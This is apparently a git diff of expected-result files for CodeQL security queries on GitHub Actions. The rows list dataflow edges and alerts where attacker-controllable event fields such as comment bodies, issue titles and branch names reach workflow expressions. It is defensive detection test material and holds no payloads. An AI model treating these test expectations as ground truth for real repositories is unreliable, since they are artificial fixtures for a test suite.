github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | -| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref deleted file mode 100644 index edaea6fbb219..000000000000 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/ExpressionInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected similarity index 70% rename from ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected rename to ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 8236c4d78291..9101c80a5955 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -3,6 +3,7 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -63,10 +64,15 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | @@ -194,73 +200,77 @@ nodes | action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | github.event.issue.title | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | github.event.issue.body | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | github.event.comment.body | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | env.pr_message | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | github.event.comment.body | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | github.event.pages[1].title | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | github.event.pages[11].title | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | github.event.pages[0].page_name | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | github.event.pages[2222].page_name | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | steps.trim-url.outputs.trimmed_url | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | github.event.issue.title | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | github.event.issue.body | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | env.global_env | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | env.job_env | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | env.step_env | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | github.event.review.body | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | github.event.comment.body | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | github.event.pull_request.body | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | github.head_ref | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | github.event.commits[11].message | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | github.event.commits[11].author.email | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | github.event.commits[11].author.name | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | github.event.head_commit.message | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | github.event.head_commit.author.email | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | github.event.head_commit.author.name | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | github.event.head_commit.committer.email | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | github.event.head_commit.committer.name | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | github.event.commits[11].committer.email | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | github.event.commits[11].committer.name | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | steps.summary.outputs.value | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | 